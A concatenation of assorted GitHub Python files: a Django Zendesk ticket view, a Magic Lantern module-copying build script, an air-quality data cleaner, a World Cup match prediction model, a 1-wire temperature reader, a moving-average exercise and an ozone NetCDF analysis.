Ticket(description=Description,subject=Subject,priority=Priority,custom_fields=[CustomField(id=6946196446109, value=Email),CustomField(id=6946196963741, value=Phone)],
requester=User(name=request.user.name, email=request.user.email)))
messages.success(request,"Ticket Submitted Successfuly")
return redirect('user_homepage')
return redirect('login')
# DELETE
def delete_ticket(request,id):
tickets = zenpy_client.tickets()
for ticket in tickets:
if ticket.id ==id:
zenpy_client.tickets.delete(ticket)
if request.user.is_admin:
return redirect('list')
return redirect('tickets')
# VIEW
def lists(request):
tickets = zenpy_client.tickets()
my_tickets=[]
for ticket in tickets:
my_tickets.append(ticket.to_dict())
context = {'p':my_tickets}
return render(request,'list.html', context)
| nikhilmp448/PeerXP-AcmeSupport | ticket/views.py | views.py | py | 1,775 | python | en | code | 0 | github-code | 13 |
39636259644 | #!/usr/bin/env python3
import os
import sys
import shutil
import argparse
import glob
def main():
args = parse_args()
copy_good_modules(args.module_names, args.cam_dir, args.dest_dir)
def parse_args():
description = """Given a directory path, and a list of module names,
copies each module into the dir, if the cam being built has the symbols needed
for the module to run. That is: put the right modules into the cam build.
Used during the build to copy the correct modules into a zip.
"""
parser = argparse.ArgumentParser(description=description)
parser.add_argument("dest_dir",
help="path to copy modules into, e.g. "
"platform/200D.101/zip/ML/modules")
parser.add_argument("module_names",
nargs="*",
help="e.g. adv_int edmac")
args = parser.parse_args()
if len(args.module_names) == 0:
print("No module names given")
sys.exit(1)
dest_dir = args.dest_dir
if not os.path.isdir(dest_dir):
print("dest_dir didn't exist or wasn't a dir: '%s'"
% dest_dir)
sys.exit(2)
# We assume this is only called from platform dirs (is this true?)
# with INSTALL_MODULES_DIR as target and that has this form:
# <full path>/platform/200D.101/zip/ML/modules
path_components = dest_dir.split(os.path.sep)
if "platform" not in path_components:
print("dest_dir didn't contain 'platform' dir: '%s'" % dest_dir)
sys.exit(3)
platform_index = path_components.index("platform")
cam_dir = path_components[platform_index + 1]
if len(cam_dir.split(".")) != 2:
# We expect cam dirs to have a dot separating cam from FW version.
# Not a great test but does work at present.
print("cam dir looked weird: '%s'" % cam_dir)
sys.exit(4)
cam_dir = os.path.join(dest_dir, "..", "..", "..")
if "magiclantern.sym" not in os.listdir(cam_dir):
# This happens for ML_SRC_PROFILE = minimal builds.
# SJE TODO: make minimal builds not try to copy modules?
# For now, we simply don't try. This might cause problems
# if a cam dir should produce the sym file but failed to do so?
print("No magiclantern.sym in cam dir, can't include modules: '%s'"
% dest_dir)
sys.exit(0)
args.cam_dir = os.path.relpath(cam_dir)
return args
def copy_good_modules(module_names, cam_dir, dest_dir):
modules = {Module(m) for m in module_names}
# get ML exported symbols from current cam dir,
# lines are of format:
# 0x1f0120 some_name
with open(os.path.join(cam_dir, "magiclantern.sym"), "r") as f:
available_syms = {s.strip().split()[1] for s in f}
all_syms = available_syms.copy()
for m in modules:
all_syms.update(m.syms)
# rule out modules that require symbols that nothing provides
cannot_sat_m = {m for m in modules if m.deps - all_syms}
can_sat_m = modules - cannot_sat_m
for m in cannot_sat_m:
m.unsatisfied_deps = m.deps - all_syms
# Try to find required symbols, initially only from ML exports.
# As we find modules where all dependencies are satisfied,
# we add their symbols to those we can use, because these
# will be copied into the build.
#
# I do two passes because sets are unordered and I'm assuming
# no modules have deep dependencies, this ensures all one-deep
# deps can be found.
#
# A more sophisticated strategy would probably use a dependency
# graph.
max_passes = 2
while max_passes:
for m in can_sat_m:
if m.unsatisfied_deps:
if m.deps.issubset(available_syms):
m.unsatisfied_deps = {}
available_syms.update(m.syms)
else:
m.unsatisfied_deps = m.deps - available_syms
max_passes -= 1
unsat_m = {m for m in can_sat_m if m.unsatisfied_deps}
sat_m = can_sat_m - unsat_m
print("These modules cannot be included (not possible to meet listed deps):")
for m in cannot_sat_m:
print("%s " % m.name)
for d in m.unsatisfied_deps:
print("\t%s" % d)
print("\nThese modules will not be included (deps not solved):")
for m in unsat_m:
print("%s " % m.name)
for d in m.unsatisfied_deps:
print("\t%s" % d)
print("\nThese modules will be included (deps met):")
for m in sat_m:
print("%s " % m.name)
# copy satisfied modules to output dir
for m in sat_m:
shutil.copy(m.mo_file, dest_dir)
if unsat_m:
# This means our dep solver is inadequate; perhaps
# there's a module with a deeper dependency chain than before?
#
# Break the build so someone fixes this.
print("Failing build due to unsolved module dependencies")
sys.exit(6)
class ModuleError(Exception):
pass
class Module:
def __init__(self, name):
# We expect to be run in the modules dir,
# so the name is also the name of a subdir.
#
# E.g. dot_tune, and we expect these related
# files to exist:
# modules/dot_tune/dot_tune.mo
# modules/dot_tune/dot_tune.dep
# modules/dot_tune/dot_tune.sym
self.mo_file = os.path.join(name, name + ".mo")
self.dep_file = os.path.join(name, name + ".dep")
self.sym_file = os.path.join(name, name + ".sym")
self.name = name
# get required symbols
with open(self.dep_file, "r") as f:
self.deps = {d.rstrip() for d in f}
self.unsatisfied_deps = self.deps
# get exported_symbols (often empty),
# lines are of format:
# 0x1f0120 some_name
with open(self.sym_file, "r") as f:
self.syms = {s.strip().split()[1] for s in f}
def __str__(self):
s = "Module: %s\n" % self.name
s += "\t%s\n" % self.mo_file
s += "\tUnsat deps:\n"
for d in self.unsatisfied_deps:
s += "\t\t%s\n" % d
s += "\tSyms:\n"
for sym in self.syms:
s += "\t\t%s\n" % sym
return s
if __name__ == "__main__":
main()
| reticulatedpines/magiclantern_simplified | modules/copy_modules_with_satisfied_deps.py | copy_modules_with_satisfied_deps.py | py | 6,277 | python | en | code | 105 | github-code | 13 |
2401462663 | import pandas as pd
import os
from datetime import datetime
csv_data = os.path.join(os.getcwd(), '../bristol-air-quality-data.csv')
print(csv_data)
df = pd.read_csv(csv_data, sep = ';')
df = df.dropna(how='all')
'''
DATAFRAME TRANSFORMATION AND CLEANING
'''
def data_cleaning(df):
df['Date Time'] = pd.to_datetime(df['Date Time'])
df['Date Time'] = df['Date Time'].dt.tz_localize(None)
df[['NOx', 'NO2', 'NO','PM10', 'NVPM10', 'VPM10', 'NVPM2.5', 'PM2.5', 'VPM2.5',
'CO', 'O3', 'SO2', 'Temperature', 'RH', 'Air Pressure']] = df[['NOx', 'NO2', 'NO','PM10',
'NVPM10', 'VPM10', 'NVPM2.5', 'PM2.5', 'VPM2.5', 'CO', 'O3', 'SO2', 'Temperature', 'RH', 'Air Pressure']].fillna(0.0)
# #int
df[['SiteID']] = df[['SiteID']].fillna(0)
# # #bool
df[['Current']] = df[['Current']].fillna('No Response')
df[['Date Time']] = df[['Date Time']].fillna(datetime.now())
# #string
df[['Location', 'geo_point_2d', 'DateStart', 'DateEnd', 'Instrument Type']] = df[['Location',
'geo_point_2d', 'DateStart', 'DateEnd', 'Instrument Type']].fillna('No records')
return df
clean_df = data_cleaning(df)
def Nan_check(data_df):
'''
This checks if there is any columns with nan
'''
nan_check = df.isnull().sum().values
print(nan_check)
max_value = max(nan_check)
min_value = min(nan_check)
check = 'No more Nan values' if max_value == min_value else 'Nan still exist in the dataframe'
return check
nan_status = Nan_check(clean_df)
print(nan_status)
'''
Generating the clean csv data
'''
if nan_status == 'No more Nan values':
clean_df[:3].to_csv('clean.csv', index=False)
data_quantity = len(clean_df)
print('csv file generated successfully')
print('Total quantity of clean records is {}'.format(data_quantity))
else:
print('Unable to generate data due to some NAN in the data')
#print(clean_df.head(2))
| nathphoenix/Air_analysis | question1/clean.py | clean.py | py | 1,864 | python | en | code | 0 | github-code | 13 |
39177668541 | import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np # linear algebra
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
from sklearn.model_selection import train_test_split, GridSearchCV
from sklearn.metrics import confusion_matrix, roc_curve, roc_auc_score
from collections.abc import Iterable
from operator import itemgetter
# 现在我们已经准备好了一个数据库,并且拥有具有预测能力的列,我们可以开始建模了。
# 将测试两个模型:随机森林和梯度增强。被选中的将是记忆最深刻的一个。
model_db = pd.read_csv("kaggle/model_db.csv")
X = model_db.iloc[:, 3:]
y = model_db[["target"]]
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size= 0.2, random_state=1)
#梯度提升分类器
gb = GradientBoostingClassifier(random_state=5)
params = {"learning_rate": [0.01, 0.1, 0.5],
"min_samples_split": [5, 10],
"min_samples_leaf": [3, 5],
"max_depth":[3,5,10],
"max_features":["sqrt"],
"n_estimators":[100, 200]
}
gb_cv = GridSearchCV(gb, params, cv = 3, n_jobs = -1, verbose = False)
gb_cv.fit(X_train.values, np.ravel(y_train))
gb = gb_cv.best_estimator_
print(gb)
params_rf = {"max_depth": [20],
"min_samples_split": [10],
"max_leaf_nodes": [175],
"min_samples_leaf": [5],
"n_estimators": [250],
"max_features": ["sqrt"],
}
#随机森林分类器
rf = RandomForestClassifier(random_state=1)
rf_cv = GridSearchCV(rf, params_rf, cv = 3, n_jobs = -1, verbose = False)
rf_cv.fit(X_train.values, np.ravel(y_train))
rf = rf_cv.best_estimator_
print(rf)
#分析模型
def analyze(model):
fpr, tpr, _ = roc_curve(y_test, model.predict_proba(X_test.values)[:, 1]) # test AUC
plt.figure(figsize=(15, 10))
plt.plot([0, 1], [0, 1], 'k--')
plt.plot(fpr, tpr, label="test")
fpr_train, tpr_train, _ = roc_curve(y_train, model.predict_proba(X_train.values)[:, 1]) # train AUC
plt.plot(fpr_train, tpr_train, label="train")
auc_test = roc_auc_score(y_test, model.predict_proba(X_test.values)[:, 1])
auc_train = roc_auc_score(y_train, model.predict_proba(X_train.values)[:, 1])
plt.legend()
plt.title('AUC score is %.2f on test and %.2f on training' % (auc_test, auc_train))
plt.show()
plt.figure(figsize=(15, 10))
cm = confusion_matrix(y_test, model.predict(X_test.values))
sns.heatmap(cm, annot=True, fmt="d")
#随机森林模型稍微好一点,但似乎不太适合。因此,我们将使用梯度提升模型。
analyze(gb)
analyze(rf)
#开始比赛仿真
#第一件事是创造FIFA世界杯比赛。为了做到这一点,我将在维基百科上找到球队和小组赛。
# dfs = pd.read_html(r"https://en.wikipedia.org/wiki/2022_FIFA_World_Cup#Teams")
# for i in range(len(dfs)):
# df = dfs[i]
# cols = list(df.columns.values)
#
# if isinstance(cols[0], Iterable):
# if any("Tie-breaking criteria" in c for c in cols):
# start_pos = i + 1
#
# if any("Match 46" in c for c in cols):
# end_pos = i + 1
# matches = []
groups = ["A", "B", "C", "D", "E", "F", "G", "H"]
group_count = 7
#table = {}
# TABLE -> TEAM, POINTS, WIN PROBS (CRITERIO DE DESEMPATE)
#table[groups[group_count]] = [[a.split(" ")[0], 0, []] for a in list(dfs[start_pos].iloc[:, 1].values)]
table = {'A': [['Qatar', 0, []], ['Ecuador', 0, []], ['Senegal', 0, []], ['Netherlands', 0, []]],
'B': [['England', 0, []], ['Iran', 0, []], ['United States', 0, []], ['Wales', 0, []]],
'C': [['Argentina', 0, []], ['Saudi Arabia', 0, []], ['Mexico', 0, []], ['Poland', 0, []]],
'D': [['France', 0, []], ['Australia', 0, []], ['Denmark', 0, []], ['Tunisia', 0, []]],
'E': [['Spain', 0, []], ['Costa Rica', 0, []], ['Germany', 0, []], ['Japan', 0, []]],
'F': [['Belgium', 0, []], ['Canada', 0, []], ['Morocco', 0, []], ['Croatia', 0, []]],
'G': [['Brazil', 0, []], ['Serbia', 0, []], ['Switzerland', 0, []], ['Cameroon', 0, []]],
'H': [['Portugal', 0, []], ['Ghana', 0, []], ['Uruguay', 0, []], ['South Korea', 0, []]]}
#for i in range(start_pos + 1, end_pos, 1):
# for i in range(13, 67, 1):
# if len(dfs[i].columns) == 3:
# team_1 = dfs[i].columns.values[0]
# team_2 = dfs[i].columns.values[-1]
#
# matches.append((groups[group_count], team_1, team_2))
# else:
# group_count+=1
# table[groups[group_count]] = [[a, 0, []] for a in list(dfs[i].iloc[:, 1].values)]
matches = [('A', 'Qatar', 'Ecuador'),
('A', 'Senegal', 'Netherlands'),
('A', 'Qatar', 'Senegal'),
('A', 'Netherlands', 'Ecuador'),
('A', 'Ecuador', 'Senegal'),
('A', 'Netherlands', 'Qatar'),
('B', 'England', 'Iran'),
('B', 'United States', 'Wales'),
('B', 'Wales', 'Iran'),
('B', 'England', 'United States'),
('B', 'Wales', 'England'),
('B', 'Iran', 'United States'),
('C', 'Argentina', 'Saudi Arabia'),
('C', 'Mexico', 'Poland'),
('C', 'Poland', 'Saudi Arabia'),
('C', 'Argentina', 'Mexico'),
('C', 'Poland', 'Argentina'),
('C', 'Saudi Arabia', 'Mexico'),
('D', 'Denmark', 'Tunisia'),
('D', 'France', 'Australia'),
('D', 'Tunisia', 'Australia'),
('D', 'France', 'Denmark'),
('D', 'Australia', 'Denmark'),
('D', 'Tunisia', 'France'),
('E', 'Germany', 'Japan'),
('E', 'Spain', 'Costa Rica'),
('E', 'Japan', 'Costa Rica'),
('E', 'Spain', 'Germany'),
('E', 'Japan', 'Spain'),
('E', 'Costa Rica', 'Germany'),
('F', 'Morocco', 'Croatia'),
('F', 'Belgium', 'Canada'),
('F', 'Belgium', 'Morocco'),
('F', 'Croatia', 'Canada'),
('F', 'Croatia', 'Belgium'),
('F', 'Canada', 'Morocco'),
('G', 'Switzerland', 'Cameroon'),
('G', 'Brazil', 'Serbia'),
('G', 'Cameroon', 'Serbia'),
('G', 'Brazil', 'Switzerland'),
('G', 'Serbia', 'Switzerland'),
('G', 'Cameroon', 'Brazil'),
('H', 'Uruguay', 'South Korea'),
('H', 'Portugal', 'Ghana'),
('H', 'South Korea', 'Ghana'),
('H', 'Portugal', 'Uruguay'),
('H', 'Ghana', 'Uruguay'),
('H', 'South Korea', 'Portugal')]
print(table)
#上面,我们还存储了球队在小组中的得分和每场比赛获胜的概率。当两队得分相同时,获胜概率的平均值将作为决胜局。
print(matches[:10])
#我将使用上一场比赛的统计数据作为参与比赛的每个团队的统计数据。比如,巴西对塞尔维亚,巴西的数据是他们上一场比赛的数据,塞尔维亚也是如此。
team_stats_raw = pd.read_csv("kaggle/team_stats_raw.csv")
def find_stats(team_1):
#team_1 = "Qatar"
past_games = team_stats_raw[(team_stats_raw["team"] == team_1)].sort_values("date")
last5 = team_stats_raw[(team_stats_raw["team"] == team_1)].sort_values("date").tail(5)
team_1_rank = past_games["rank"].values[-1]
team_1_goals = past_games.score.mean()
team_1_goals_l5 = last5.score.mean()
team_1_goals_suf = past_games.suf_score.mean()
team_1_goals_suf_l5 = last5.suf_score.mean()
team_1_rank_suf = past_games.rank_suf.mean()
team_1_rank_suf_l5 = last5.rank_suf.mean()
team_1_gp_rank = past_games.points_by_rank.mean()
team_1_gp_rank_l5 = last5.points_by_rank.mean()
return [team_1_rank, team_1_goals, team_1_goals_l5, team_1_goals_suf, team_1_goals_suf_l5, team_1_rank_suf, team_1_rank_suf_l5, team_1_gp_rank, team_1_gp_rank_l5]
def find_features(team_1, team_2):
rank_dif = team_1[0] - team_2[0]
goals_dif = team_1[1] - team_2[1]
goals_dif_l5 = team_1[2] - team_2[2]
goals_suf_dif = team_1[3] - team_2[3]
goals_suf_dif_l5 = team_1[4] - team_2[4]
goals_per_ranking_dif = (team_1[1] / team_1[5]) - (team_2[1] / team_2[5])
dif_rank_agst = team_1[5] - team_2[5]
dif_rank_agst_l5 = team_1[6] - team_2[6]
dif_gp_rank = team_1[7] - team_2[7]
dif_gp_rank_l5 = team_1[8] - team_2[8]
return [rank_dif, goals_dif, goals_dif_l5, goals_suf_dif, goals_suf_dif_l5, goals_per_ranking_dif, dif_rank_agst,
dif_rank_agst_l5, dif_gp_rank, dif_gp_rank_l5, 1, 0]
#现在,我们可以模拟了。
#由于该模型模拟的是1队是否会赢,因此需要创建一些标准来定义平局。此外,由于我们在世界杯上没有主场优势,我们的想法是预测两场比赛,改变1队和2队。
#概率平均值最高的队伍将被指定为获胜者。在小组赛阶段,如果“主队”作为1队赢了,作为2队输了,或者“主队”作为2队赢了,作为1队输了,那么在那场比赛中会被分配到平局。
advanced_group = []
last_group = ""
for k in table.keys():
for t in table[k]:
t[1] = 0
t[2] = []
for teams in matches:
draw = False
team_1 = find_stats(teams[1])
team_2 = find_stats(teams[2])
features_g1 = find_features(team_1, team_2)
features_g2 = find_features(team_2, team_1)
probs_g1 = gb.predict_proba([features_g1])
probs_g2 = gb.predict_proba([features_g2])
team_1_prob_g1 = probs_g1[0][0]
team_1_prob_g2 = probs_g2[0][1]
team_2_prob_g1 = probs_g1[0][1]
team_2_prob_g2 = probs_g2[0][0]
team_1_prob = (probs_g1[0][0] + probs_g2[0][1]) / 2
team_2_prob = (probs_g2[0][0] + probs_g1[0][1]) / 2
if ((team_1_prob_g1 > team_2_prob_g1) & (team_2_prob_g2 > team_1_prob_g2)) | (
(team_1_prob_g1 < team_2_prob_g1) & (team_2_prob_g2 < team_1_prob_g2)):
draw = True
for i in table[teams[0]]:
if i[0] == teams[1] or i[0] == teams[2]:
i[1] += 1
elif team_1_prob > team_2_prob:
winner = teams[1]
winner_proba = team_1_prob
for i in table[teams[0]]:
if i[0] == teams[1]:
i[1] += 3
elif team_2_prob > team_1_prob:
winner = teams[2]
winner_proba = team_2_prob
for i in table[teams[0]]:
if i[0] == teams[2]:
i[1] += 3
for i in table[teams[0]]: # adding criterio de desempate (probs por jogo)
if i[0] == teams[1]:
i[2].append(team_1_prob)
if i[0] == teams[2]:
i[2].append(team_2_prob)
if last_group != teams[0]:
if last_group != "":
print("\n")
print("Group %s advanced: " % (last_group))
for i in table[last_group]: # adding crieterio de desempate
i[2] = np.mean(i[2])
final_points = table[last_group]
final_table = sorted(final_points, key=itemgetter(1, 2), reverse=True)
advanced_group.append([final_table[0][0], final_table[1][0]])
for i in final_table:
print("%s -------- %d" % (i[0], i[1]))
print("\n")
print("-" * 10 + " Starting Analysis for Group %s " % (teams[0]) + "-" * 10)
if draw == False:
print("Group %s - %s vs. %s: Winner %s with %.2f probability" % (
teams[0], teams[1], teams[2], winner, winner_proba))
else:
print("Group %s - %s vs. %s: Draw" % (teams[0], teams[1], teams[2]))
last_group = teams[0]
print("\n")
print("Group %s advanced: " % (last_group))
for i in table[last_group]: # adding crieterio de desempate
i[2] = np.mean(i[2])
final_points = table[last_group]
final_table = sorted(final_points, key=itemgetter(1, 2), reverse=True)
advanced_group.append([final_table[0][0], final_table[1][0]])
for i in final_table:
print("%s -------- %d" % (i[0], i[1]))
#小组赛阶段预测不会有意外,也可能是巴西和瑞士或者法国和丹麦之间的平局。
#对于季后赛阶段,我将预测并以图形方式展示它,就像这里做的一样。
advanced = advanced_group
playoffs = {"Round of 16": [], "Quarter-Final": [], "Semi-Final": [], "Final": []}
for p in playoffs.keys():
playoffs[p] = []
actual_round = ""
next_rounds = []
for p in playoffs.keys():
if p == "Round of 16":
control = []
for a in range(0, len(advanced * 2), 1):
if a < len(advanced):
if a % 2 == 0:
control.append((advanced * 2)[a][0])
else:
control.append((advanced * 2)[a][1])
else:
if a % 2 == 0:
control.append((advanced * 2)[a][1])
else:
control.append((advanced * 2)[a][0])
playoffs[p] = [[control[c], control[c + 1]] for c in range(0, len(control) - 1, 1) if c % 2 == 0]
for i in range(0, len(playoffs[p]), 1):
game = playoffs[p][i]
home = game[0]
away = game[1]
team_1 = find_stats(home)
team_2 = find_stats(away)
features_g1 = find_features(team_1, team_2)
features_g2 = find_features(team_2, team_1)
probs_g1 = gb.predict_proba([features_g1])
probs_g2 = gb.predict_proba([features_g2])
team_1_prob = (probs_g1[0][0] + probs_g2[0][1]) / 2
team_2_prob = (probs_g2[0][0] + probs_g1[0][1]) / 2
if actual_round != p:
print("-" * 10)
print("Starting simulation of %s" % (p))
print("-" * 10)
print("\n")
if team_1_prob < team_2_prob:
print("%s vs. %s: %s advances with prob %.2f" % (home, away, away, team_2_prob))
next_rounds.append(away)
else:
print("%s vs. %s: %s advances with prob %.2f" % (home, away, home, team_1_prob))
next_rounds.append(home)
game.append([team_1_prob, team_2_prob])
playoffs[p][i] = game
actual_round = p
else:
playoffs[p] = [[next_rounds[c], next_rounds[c + 1]] for c in range(0, len(next_rounds) - 1, 1) if c % 2 == 0]
next_rounds = []
for i in range(0, len(playoffs[p])):
game = playoffs[p][i]
home = game[0]
away = game[1]
team_1 = find_stats(home)
team_2 = find_stats(away)
features_g1 = find_features(team_1, team_2)
features_g2 = find_features(team_2, team_1)
probs_g1 = gb.predict_proba([features_g1])
probs_g2 = gb.predict_proba([features_g2])
team_1_prob = (probs_g1[0][0] + probs_g2[0][1]) / 2
team_2_prob = (probs_g2[0][0] + probs_g1[0][1]) / 2
if actual_round != p:
print("-" * 10)
print("Starting simulation of %s" % (p))
print("-" * 10)
print("\n")
if team_1_prob < team_2_prob:
print("%s vs. %s: %s advances with prob %.2f" % (home, away, away, team_2_prob))
next_rounds.append(away)
else:
print("%s vs. %s: %s advances with prob %.2f" % (home, away, home, team_1_prob))
next_rounds.append(home)
game.append([team_1_prob, team_2_prob])
playoffs[p][i] = game
actual_round = p
#画球队晋级图
# import networkx as nx
# from networkx.drawing.nx_pydot import graphviz_layout
#
# plt.figure(figsize=(15, 10))
# G = nx.balanced_tree(2, 3)
#
# labels = []
#
# for p in playoffs.keys():
# for game in playoffs[p]:
# label = f"{game[0]}({round(game[2][0], 2)}) \n {game[1]}({round(game[2][1], 2)})"
# labels.append(label)
#
# labels_dict = {}
# labels_rev = list(reversed(labels))
#
# for l in range(len(list(G.nodes))):
# labels_dict[l] = labels_rev[l]
#
# pos = graphviz_layout(G, prog='twopi')
# labels_pos = {n: (k[0], k[1] - 0.08 * k[1]) for n, k in pos.items()}
# center = pd.DataFrame(pos).mean(axis=1).mean()
#
# nx.draw(G, pos=pos, with_labels=False, node_color=range(15), edge_color="#bbf5bb", width=10, font_weight='bold',
# cmap=plt.cm.Greens, node_size=5000)
# nx.draw_networkx_labels(G, pos=labels_pos, bbox=dict(boxstyle="round,pad=0.3", fc="white", ec="black", lw=.5, alpha=1),
# labels=labels_dict)
# texts = ["Round \nof 16", "Quarter \n Final", "Semi \n Final", "Final\n"]
# pos_y = pos[0][1] + 55
# for text in reversed(texts):
# pos_x = center
# pos_y -= 75
# plt.text(pos_y, pos_x, text, fontsize=18)
#
# plt.axis('equal')
# plt.show()
#这就是最后的模拟!巴西赢得了第六个冠军!希望我的预测是正确的。
#分析一下可能出现的麻烦也很好。比利时战胜了德国,最后被葡萄牙击败。阿根廷对荷兰的比赛非常紧张,荷兰的传球优势接近1%。
#同样的情况也发生在法国和英格兰之间,英格兰通过。我认为英格兰进入决赛是模拟比赛中最大的意外。
#更新:数据库更新了各国国家队在世界杯前的最后一场友谊赛,因此,一些模拟也发生了变化。
#法国队在四分之一决赛中击败了英格兰队,在半决赛中被葡萄牙队击败!葡萄牙进入决赛是一个巨大的惊喜!
#结语
#这样做的目的是通过机器学习来模拟我喜欢的东西(足球世界杯)来提高我的知识。
#我认为创造出我们可以在现实生活中看到结果的模型是很神奇的,这就是将要发生的事情!
#总的来说,我认为这个模型的预测就像看足球的人的常识一样。在模拟中没有什么大的惊喜。
#在小组赛中看到不知名球队的比赛也很好,比如伊朗对阵威尔士,或者塞内加尔对阵厄瓜多尔。
#我认为在这样的比赛中,这种模式对投注有很好的指导作用,因为大多数人对二线国家队的了解并不多。
| ace825093791/worldcup | TheModel.py | TheModel.py | py | 17,594 | python | en | code | 0 | github-code | 13 |
25038912879 | import sys
# open 1-wire slaves list for reading
file = open('/sys/devices/w1_bus_master1/w1_master_slaves')
# read 1-wire slaves list
w1_slaves = file.readlines()
# close 1-wire slaves list
file.close()
# print header for results table
# repeat following steps with each 1-wire slave
for line in w1_slaves:
# extract 1-wire slave
w1_slave = line.split("\n")[0]
# open 1-wire slave file
file = open('/sys/bus/w1/devices/' + str(w1_slave) + '/w1_slave')
# read content from 1-wire slave file
filecontent = file.read()
# close 1-wire slave file
file.close()
# extract temperature string
stringvalue = filecontent.split("\n")[1].split(" ")[9]
# convert temperature value
temperature = float(stringvalue[2:]) / 1000
# print temperature
print(str() + "%.1f" % temperature)
#print temperature
# quit python script
sys.exit(0)
| unixweb/myweather | temperature.py | temperature.py | py | 864 | python | en | code | 10 | github-code | 13 |
11537030937 | #####Information section#########
## Name: Jiang Li
## Email: riverlee2008@gmail.com
###############################
import numpy as np
import matplotlib.pyplot as plt
## Ab array A with 12 elemetns beginning from number 5, containing consective odd numbers.
A = np.linspace(start = 5, stop = 27, num = 12,dtype=np.float)
## Compute the simple moving average of an array(SMA), using an adjustable window using a function, the function calculating the SMA of the array must take tow input arguments: the array(A), a window width with a default value =2
def SMA(A,width=2):
## last index
last_index = len(A)-width+1
## Use list comprehension and return as numpy
return np.array([np.mean(A[i:(i+width)]) for i in range(last_index)],dtype=A.dtype)
## After every SMA is collected(as array), calculate its current cumulative moving average(CMA)
def CMA(B):
## get lens
lens = [i+1 for i in range(len(B))]
return np.cumsum(B)/lens
width=2
B = SMA(A,width=width)
C = CMA(B)
## Print the result from the two calls made above using a short description of the data:
print("The original array is", A)
print("Current window width=",width)
print("The SMA result is :",B)
print("The CMS of this SMA is: ",C)
## plot:
### The sin function for array B and C, specifying different color,linewidth, lable and figure name passed to string to hte ploting function
### Show the grid, lengend
plt.figure("Midterm")
plt.plot(np.sin(B),linewidth=1.5,linestyle="-",label="SMA",color='blue')
plt.plot(np.sin(C),linewidth=2.5,linestyle="-.",label="CMA",color='red')
plt.title("Midterm - Jiang")
plt.grid()
plt.legend(loc='upper right')
plt.show()
| riverlee/Certificate-Program-in-Data-Science.old | CSX433.3/Midterm/a_Jiang_midterm.py | a_Jiang_midterm.py | py | 1,681 | python | en | code | 0 | github-code | 13 |
24632835939 | #!/usr/bin/env python3
# pip install netCDF4
# pip install numpy
# pip install json
# pip install matplotlib
from netCDF4 import Dataset
import numpy as np
from numpy import ma
import json
import calendar
import matplotlib.pyplot as plt
'''<==========SET_DEF_VAL==========>'''
lat = 15.46
long = 47.55
city = 'Brasilia'
'''<==========CREATE_MASS==========>'''
max = np.zeros(13)
min = np.zeros(13)
mean = np.zeros(13)
month = []
for name in calendar.month_name:
month.append(name)
years = [x for x in range(1979, 2019, 1)]
'''<==========MAIN==========>'''
def ploting_ozon():
fig = plt.figure()
a1 = fig.add_subplot(111, sharex='all')
plt.title(f'{city}')
plt.ylabel('average conc. of ozone since 1979 until 2018')
a1.set_xticks(np.arange((2019 - 1979) * 12))
a1.set_xticklabels(years, rotation=60)
a1.tick_params(axis='x', which='major', labelsize=8)
'''All'''
a1.plot(res_col, color='orange')
'''Jan'''
a = ma.masked_array([0 for x in range(40)], mask=[0 for x in range(40)])
k = 0
for i in range(len(res_col)):
if i % 12 == 0:
a[k] = res_col[i]
k += 1
a1.plot(a, color='b')
#Jul
'''
x = 0
for x in range(1979, 2019, 1):
a.mask[x - 1979] = True
k = 0
for i in range(len(res_col)):
if i % 12 == 6:
a[k] = res_col[i]
k += 1
a1.plot(a, color='r')
a1.legend(['all', 'jan', 'jul'])
'''
plt.savefig('ozon.png')
def ploting():
fig = plt.figure()
a1 = fig.add_subplot(111)
plt.title(f'{city}')
plt.ylabel('average concentration of ozone')
a1.plot(max[1:13], color='r')
a1.set_xticks(np.arange(12))
a1.set_xticklabels(month[1:13], rotation=20)
a1.plot(min[1:13], color='b')
a1.plot(mean[1:13], color='orange')
a1.legend(['max', ' min', 'mean'])
plt.savefig('all_years_each_month.png')
# plt.show()
def put_temp():
ploting_ozon()
max[0] = res_col.max() # ALL
min[0] = res_col.min() # ALL
mean[0] = res_col.mean() # ALL
i = 0
while i < 12:
k = 0
while k < len(res_col):
res_col.mask[k] = True
t = k
while t > 11:
t -= 12
if t == i:
res_col.mask[k] = False
if res_col[k] == 0:
res_col.mask[k] = True
k += 1
max[i + 1] = res_col.max()
min[i + 1] = res_col.min()
mean[i + 1] = res_col.mean()
i += 1
ploting()
def save_data(dictData):
with open("ozon.json", "w", encoding="utf-8") as file:
json.dump(dictData, file, indent=4, separators=(',', ': '))
def dict_data():
dictData = {}
dictData['city'] = f'{city}'
dictData['coordinates'] = [lat, long]
i = 1
while i < len(month):
dictData[month[i]] = ({'min': min[i], 'max': max[i], 'mean': mean[i]})
i += 1
dictData['all'] = ({'min': min[0], 'max': max[0], 'mean': mean[0]})
save_data(dictData)
def f_read_val():
global lat
global long
global city
print(f'Default values:\nlat - {lat} : long - {long} : city - {city}\n')
print(f'Enter the new values to change the coordinates and the city \n')
while True:
try:
lat_tmp = float(input(f'Type LAT or press ENTER to skip: '))
except ValueError:
break
if (lat_tmp < -90.) or (lat_tmp > 90.):
break
try:
long_tmp = float(input(f'Type LAT or press ENTER to skip: '))
except ValueError:
break
if (long_tmp < -179.5) or (long_tmp > 180.):
break
try:
city_tmp = str(input(f'Type CITY or press ENTER to skip:'))
except ValueError:
break
lat = lat_tmp
long = long_tmp
city = city_tmp
break
def main():
global res_col
data = Dataset('MSR-2.nc')
temp_col = data.variables['Average_O3_column']
# temp_std = data.variables['Average_O3_std'] ### NOT USE ###
print(data)
f_read_val()
res_col = temp_col[:, lat, long]
put_temp()
dict_data()
data.close()
main()
'''<==========UNUSED_BLOCK==========>'''
''' CHECK KEYS AND ITEMS
print(data.dimensions.keys())
print('\n')
print(data.variables.keys())
print('\n')
print(data.dimensions.items())
print('\n')
print(data.variables.items())
print('\n')
'''
| artemk1337/ozon | ozon.py | ozon.py | py | 4,616 | python | en | code | 0 | github-code | 13 |
32212478340 | def solution(numbers):
num_list=numbers
answer = []
for index, value in enumerate(num_list):
for j in range(index+1,len(num_list)):
print("i",index,"J",j)
temp=value+num_list[j]
if not temp in answer:
answer.append(temp)
right=sorted(answer)
return right
print(solution([2,1,3,4,1])) | BlueScreenMaker/333_Algorithm | 백업/~220604/programmers/두개를뽑아더하기.py | 두개를뽑아더하기.py | py | 365 | python | en | code | 0 | github-code | 13 |
16840198967 | import cv2
import numpy as np
from functions import stack_images
img = cv2.imread('resources/lena.png')
